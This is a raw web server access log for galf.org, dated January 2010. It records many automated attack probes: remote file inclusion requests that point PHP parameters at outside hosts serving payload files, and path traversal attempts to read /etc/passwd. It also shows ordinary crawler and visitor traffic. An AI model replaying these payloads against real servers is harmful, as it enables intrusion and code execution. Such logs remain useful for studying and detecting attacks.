189.74.190.244 - - [31/Jan/2010:18:21:44 -0800] "GET /logs/access_091228.log/citeglligh3rwww.videomart.com.br/fabricante.php?marca=http://zbajj.gov.cn/autobox.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
88.199.14.1 - - [31/Jan/2010:18:21:50 -0800] "GET /logs/access_090720.log/index.php?option=com_custompages&cpage=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.199.14.1 - - [31/Jan/2010:18:21:50 -0800] "GET /index.php?option=com_custompages&cpage=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.199.14.1 - - [31/Jan/2010:18:21:50 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.199.14.1 - - [31/Jan/2010:18:25:15 -0800] "GET /logs/access_091019.log/index.php?option=com_custompages&cpage=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.199.14.1 - - [31/Jan/2010:18:25:23 -0800] "GET /logs/access_090907.log/index.php?option=com_custompages&cpage=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.74.58.159 - - [31/Jan/2010:18:30:53 -0800] "GET /logs/access_091228.log/citeglligh3rwww.videomart.com.br/fabricante.php?marca=http://zbajj.gov.cn/autobox.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:18:37:27 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:18:37:27 -0800] "GET /logs/?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:18:37:27 -0800] "GET /?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:18:37:46 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.171.129.73 - - [31/Jan/2010:18:39:57 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.co.uk/m/search?q=index+of+labia&site=universal&tab=iw&sa=N" "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/100.07.76; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413" "www.galf.org"
85.92.222.254 - - [31/Jan/2010:18:39:57 -0800] "GET /labia HTTP/1.1" 301 89 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
85.92.222.254 - - [31/Jan/2010:18:39:57 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
217.171.129.73 - - [31/Jan/2010:18:40:00 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/100.07.76; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413" "www.galf.org"
217.171.129.73 - - [31/Jan/2010:18:40:02 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/labia/" "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/100.07.76; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413" "www.galf.org"
85.92.222.254 - - [31/Jan/2010:18:40:02 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.galf.org"
217.171.129.73 - - [31/Jan/2010:18:40:06 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/100.07.76; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413" "www.galf.org"
88.199.14.1 - - [31/Jan/2010:18:41:22 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.199.14.1 - - [31/Jan/2010:18:41:22 -0800] "GET /logs/access.log/playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.199.14.1 - - [31/Jan/2010:18:41:22 -0800] "GET /playing.php/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.88.4.141 - - [31/Jan/2010:18:43:22 -0800] "GET /logs//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:43:22 -0800] "GET /index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:43:22 -0800] "GET /logs/access_090720.log//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:43:30 -0800] "GET /logs/access_090720.log/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:43:30 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:43:30 -0800] "GET /delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:43:33 -0800] "GET /delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:43:33 -0800] "GET /logs/access_090720.log/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:43:33 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:48:14 -0800] "GET /logs/access_090720.log/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:48:14 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:48:14 -0800] "GET /delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:48:19 -0800] "GET /logs/access_090720.log/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:48:19 -0800] "GET /delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [31/Jan/2010:18:48:19 -0800] "GET /logs/delete_all.php?board_skin_path=http://www.outdoorbooks.co.kr/admin/lib/tmp/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:49:31 -0800] "GET /index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:49:32 -0800] "GET /logs/access_090720.log//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:49:36 -0800] "GET /logs//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:49:47 -0800] "GET /logs/access_090720.log//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:49:47 -0800] "GET /index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:49:47 -0800] "GET /logs//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:16 -0800] "GET /index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:16 -0800] "GET /logs//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:16 -0800] "GET /logs/access_090720.log//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:16 -0800] "GET /logs/access_090720.log//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:16 -0800] "GET /logs//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:17 -0800] "GET /index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:18:52:47 -0800] "GET /logs/access.log/?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
188.40.203.226 - - [31/Jan/2010:18:52:47 -0800] "GET /?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
188.40.203.226 - - [31/Jan/2010:18:52:47 -0800] "GET /logs/?sourcedir=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:48 -0800] "GET /index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:48 -0800] "GET /logs/access_090720.log//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [31/Jan/2010:18:52:48 -0800] "GET /logs//index.php?option=com_joomlalib&mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:18:52:54 -0800] "GET /?sourcedir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "galf.org"
194.110.160.78 - - [31/Jan/2010:18:52:55 -0800] "GET /?sourcedir=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "galf.org"
194.110.160.78 - - [31/Jan/2010:18:53:10 -0800] "GET /atom.php5?page=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:18:53:10 -0800] "GET /atom.php5?page=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.195.113.224 - - [31/Jan/2010:18:54:26 -0800] "GET /cendoc/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:18:56:28 -0800] "GET /?sourcedir=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:18:56:28 -0800] "GET /?sourcedir=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
67.195.113.224 - - [31/Jan/2010:18:58:00 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.80.193.28 - - [31/Jan/2010:18:59:00 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; Windows NT 5.1; SV1; FunWebProducts; ZangoToolbar 4.8.2; SpamBlockerUtility 4.8.4)" "www.galf.org"
65.55.207.21 - - [31/Jan/2010:19:00:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:09:48 -0800] "GET /3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:09:48 -0800] "GET /logs//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:09:48 -0800] "GET /logs/access_091130.log%20%20//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:10:30 -0800] "GET /logs//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:10:31 -0800] "GET /logs/access_091130.log%20%20//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:10:33 -0800] "GET /3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:11:01 -0800] "GET /logs//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:11:01 -0800] "GET /3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:11:02 -0800] "GET /logs/access_091130.log%20%20//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:11:20 -0800] "GET /logs/access_100111.log%20%20//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:11:40 -0800] "GET /logs/access_090914.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:11:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:11:40 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:11:50 -0800] "GET /logs/access_100111.log%20%20//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:12:26 -0800] "GET /logs/access_100111.log%20%20//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:19:12:44 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [31/Jan/2010:19:12:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
62.67.244.57 - - [31/Jan/2010:19:12:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
87.250.252.242 - - [31/Jan/2010:19:15:48 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
65.55.207.21 - - [31/Jan/2010:19:16:09 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:18:51 -0800] "GET /index.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:18:52 -0800] "GET /index.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:18:57 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22Index+of%22+%22+logs%22&aq=f&aqi=g-c1&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:18:57 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:19:00 -0800] "GET /logs/access.log HTTP/1.1" 200 43478 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:19:00 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:19:01 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:19:17 -0800] "GET /index.php?pag=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "galf.org"
77.221.130.15 - - [31/Jan/2010:19:19:17 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:19:19:17 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [31/Jan/2010:19:19:17 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:19:19 -0800] "GET /index.php?pag=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:19:21 -0800] "GET /logs/access.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:19:19:23 -0800] "GET /index.php?file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "galf.org"
194.110.160.78 - - [31/Jan/2010:19:19:24 -0800] "GET /index.php?file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:19:37 -0800] "GET /logs/access.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:19:49 -0800] "GET /logs/access_090803.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:20:06 -0800] "GET /logs/access_090803.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:20:06 -0800] "GET /logs/access.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:20:09 -0800] "GET / HTTP/1.1" 200 1048 "http://aa.yhs.search.yahoo.com/avg/search?p=www.galf.org%22&fr=yhs-avgb&ei=UTF-8&partnerid=yhs-avgb&type=yahoo_avg_hs2-tb-web_aa" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "galf.org"
65.48.135.50 - - [31/Jan/2010:19:20:10 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "galf.org"
65.48.135.50 - - [31/Jan/2010:19:20:13 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "galf.org"
65.48.135.50 - - [31/Jan/2010:19:20:13 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:20:29 -0800] "GET /logs/access_090803.log//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/f1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.48.135.50 - - [31/Jan/2010:19:20:33 -0800] "GET /logs/access_100111.log HTTP/1.1" 200 4259840 "http://galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)" "galf.org"
77.221.130.15 - - [31/Jan/2010:19:21:14 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.32 - - [31/Jan/2010:19:21:36 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {92909D98-D3F9-4F78-8721-3F523B002337}; .NET CLR 1.1.4322)" "www.galf.org"
202.45.154.10 - - [31/Jan/2010:19:21:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.45.154.10 - - [31/Jan/2010:19:21:45 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.45.154.10 - - [31/Jan/2010:19:21:45 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [31/Jan/2010:19:23:05 -0800] "GET /logs//3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [31/Jan/2010:19:23:05 -0800] "GET /3_plugin_twindow//twindow_cart.php?shop_this_skin_path=http://www.fileden.com/files/2009/10/15/2604125/s1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
